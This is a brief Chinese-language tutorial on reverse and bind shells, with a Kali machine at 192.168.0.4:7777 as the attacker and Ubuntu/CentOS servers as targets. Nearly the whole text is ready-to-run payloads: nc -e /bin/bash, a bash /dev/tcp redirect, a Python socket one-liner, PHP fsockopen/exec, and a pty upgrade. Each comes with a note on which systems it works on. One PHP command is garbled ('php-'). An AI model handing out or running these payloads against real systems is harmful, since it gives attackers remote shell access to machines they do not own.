假如ubuntu、CentOS為目標服務器系統
kali為攻擊者的系統,ip為:192.168.0.4,開放7777端口且沒被占用
最終是將ubuntu、CentOS的shell反彈到kali上
正向反彈shell
ubuntu或者CentOS上面輸入
nc -lvp 7777 -e /bin/bash
kali上輸入
nc ip 7777
正向反彈是目標機先執行nc命令,然后kali上再進行nc監聽,即可反彈shell。
需要目標機安裝nc。
反向反彈shell
方法1:bash反彈
bash -i >& /dev/tcp/ip/port 0>&1
但首先需要在kali上使用nc監聽端口:
nc -lvp 7777
此方法在ubuntu下不會反彈成功,CentOS可以反彈成功。
方法2:python反彈
反彈shell的命令如下:
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('ip',port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);"
首先,使用nc在kali上監聽端口:
nc -lvp 7777
在CentOS或者ubuntu下使用python去反向連接,輸入:
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('192.168.0.4',7777));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(['/bin/bash','-i']);
此方法ubuntu和Linux均反彈成功。
方法3
首先在kali上輸入nc監聽:
nc -lvp 7777
在CentOS或者ubuntu 上使用nc去反向連接,命令如下:
nc -e /bin/bash 192.168.0.4 7777
方法4:php反彈shell
首先在kali上輸入:
nc -lvp 7777
然后在目標機上輸入:
php- 'exec("/bin/bash -i >& /dev/tcp/192.168.0.4/7777")' 或 php -r '$sock=fsockopen("192.168.0.4",7777);exec("/bin/bash -i 0>&3 1>&3 2>&3");'
注意php反彈shell的這些方法都需要php關閉safe_mode這個選項,才可以使用exec函數。
遇到反彈后不是正常的shell,可用命令:
python -c 'import pty;pty.spawn("/bin/bash")'
轉化為常規的shell。